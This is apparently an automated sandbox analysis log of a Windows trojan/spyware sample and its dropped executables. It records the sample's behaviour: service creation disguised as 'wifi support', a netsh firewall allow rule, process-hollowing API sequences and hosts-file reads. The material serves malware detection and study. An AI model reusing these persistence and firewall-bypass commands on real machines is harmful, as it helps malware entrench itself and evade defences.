                      Source: 18D.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: haifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: scifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: scifbcd.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sdiimdop.exe.18.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Section loaded: mscorjit.dll
Source: nkINykHreE.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: String function: 0040EE2A appears 40 times
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: String function: 00402544 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: String function: 00542794 appears 35 times
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: String function: 00422420 appears 157 times
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: String function: 00422260 appears 114 times
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: String function: 0042CE40 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: String function: 00422600 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: String function: 00422440 appears 57 times
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 0_2_00540110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_2_00402491 NtOpenKey,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 1_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 13_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Code function: 14_2_00470110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00401962 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_0040196D Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00401A0B NtTerminateProcess,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_2_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_00402084 LocalAlloc,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\haifbcd | Code function: 15_1_00402491 NtOpenKey,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_0040193B Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_00401947 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_0040174C NtMapViewOfSection,NtMapViewOfSection,Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_00401951 Sleep,NtTerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_00401FF1 NtQuerySystemInformation,NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_004016FD NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_0040158E NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_004015A6 NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Code function: 17_2_004015BC NtMapViewOfSection,NtMapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Code function: 19_2_056BF480 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Code function: 19_2_056BF3A0 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
Source: 2757.exe.3.dr | Static PE information: Resource name: RT_STRING type: VAX-order 68k Blit mpx/mux executable
Source: 28C2.exe.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 4583.exe.3.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 2757.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 4187.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 1B15.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 28C2.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 315E.exe.3.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
Source: 2757.exe.3.dr | Static PE information: Section: .rdata ZLIB complexity 0.999518743408
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.00042941046
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.00537109375
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.0006377551
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.0107421875
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.001953125
Source: 315E.exe.3.dr | Static PE information: Section: ZLIB complexity 1.021484375
Source: 4BED.exe.3.dr | Static PE information: Section: ZLIB complexity 1.00015356453
Source: nkINykHreE.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\haifbcd
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@57/40@107/34
Source: C:\Users\user\AppData\Local\Temp\18D.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Code function: 18_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Code function: 31_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
Source: nkINykHreE.exe | Virustotal: Detection: 25%
Source: nkINykHreE.exe | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\nkINykHreE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
Source: C:\Users\user\Desktop\nkINykHreE.exe | Process created: C:\Users\user\Desktop\nkINykHreE.exe "C:\Users\user\Desktop\nkINykHreE.exe"
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
Source: C:\Users\user\AppData\Roaming\haifbcd | Process created: C:\Users\user\AppData\Roaming\haifbcd C:\Users\user\AppData\Roaming\haifbcd
Source: C:\Users\user\AppData\Local\Temp\115B.exe | Process created: C:\Users\user\AppData\Local\Temp\115B.exe C:\Users\user\AppData\Local\Temp\115B.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\2997.exe C:\Users\user\AppData\Local\Temp\2997.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\18D.exe C:\Users\user\AppData\Local\Temp\18D.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\dbgxuqbr\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\sdiimdop.exe" C:\Windows\SysWOW64\dbgxuqbr\
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create dbgxuqbr binPath= "C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d\"C:\Users\user\AppData\Local\Temp\18D.exe\"" type= own start= auto DisplayName= "wifi support
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" description dbgxuqbr "wifi internet conection
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\System32\sc.exe" start dbgxuqbr
Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
Source: unknown | Process created: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe /d"C:\Users\user\AppData\Local\Temp\18D.exe"
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Process created: C:\Users\user\AppData\Local\Temp\CBA.exe C:\Users\user\AppData\Local\Temp\CBA.exe
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\scifbcd C:\Users\user\AppData\Roaming\scifbcd
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\2757.exe C:\Users\user\AppData\Local\Temp\2757.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\4187.exe C:\Users\user\AppData\Local\Temp\4187.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\13E0.exe C:\Users\user\AppData\Local\Temp\13E0.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\1B15.exe C:\Users\user\AppData\Local\Temp\1B15.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\28C2.exe C:\Users\user\AppData\Local\Temp\28C2.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\315E.exe C:\Users\user\AppData\Local\Temp\315E.exe
Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\4583.exe C:\Users\user\AppData\Local\Temp\4583.exe
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\115B.tmp
Source: C:\Users\user\Desktop\nkINykHreE.exe | Code function: 0_2_0041C6FF SetLastError,GetProfileStringW,WriteProfileSectionW,GetProfileStringA,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryA,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoA,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeaps,WritePrivateProfileStringW,GetPriorityClass,
Source: C:\Users\user\AppData\Local\Temp\CBA.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5032:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6972:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4140:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3952:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: \H
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: \H
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\2997.exe | Command line argument: E6B
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-BX<
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-BX<
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-BX<
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-B
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: \H
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-BX<
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-BX<
Source: C:\Users\user\AppData\Local\Temp\18D.exe | Command line argument: e-B
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-BX<
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-BX<
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-BX<
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-B
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: \H
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-BX<
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-BX<
Source: C:\Windows\SysWOW64\dbgxuqbr\sdiimdop.exe | Command line argument: e-B
Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: CBA.exe.3.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.0.CBA.exe.cb0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs | Cryptographic APIs: 'CreateDecryptor'
                      Source: 19.2.CBA.exe.cb0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\2997.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: nkINykHreE.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\hatisicovapehe\p.pdb source: 2997.exe, 2997.exe, 00000011.00000002.369808653.0000000000409000.00000020.00020000.sdmp, 2997.exe, 00000011.00000000.353771272.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vuyeguw\zofaxekax.pdb source: nkINykHreE.exe, nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\gilos\ye.pdb source: 18D.exe, 00000012.00000002.391234957.0000000000782000.00000004.00000001.sdmp, 18D.exe, 00000012.00000000.365358490.0000000000401000.00000020.00020000.sdmp, sdiimdop.exe, 0000001F.00000000.391356677.0000000000401000.00000020.00020000.sdmp, svchost.exe, 00000022.00000003.465105222.0000000003258000.00000004.00000001.sdmp
                      Source: Binary string: i6`C:\vuyeguw\zofaxekax.pdbhQD source: nkINykHreE.exe, 00000000.00000000.237076372.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000000.00000002.243796103.0000000000401000.00000020.00020000.sdmp, nkINykHreE.exe, 00000001.00000000.241917269.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000002.340276141.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000D.00000000.331309043.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000000.333118920.0000000000401000.00000020.00020000.sdmp, 115B.exe, 0000000E.00000002.341669958.0000000000401000.00000020.00020000.sdmp, haifbcd, 0000000F.00000000.337510866.0000000000401000.00000020.00020000.sdmp, 115B.exe, 00000010.00000000.338143119.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: kJC:\tozeroc-watege99_zaga\vifalaro.pdb source: 4187.exe, 0000002A.00000003.446573203.0000000000CB0000.00000004.00000001.sdmp
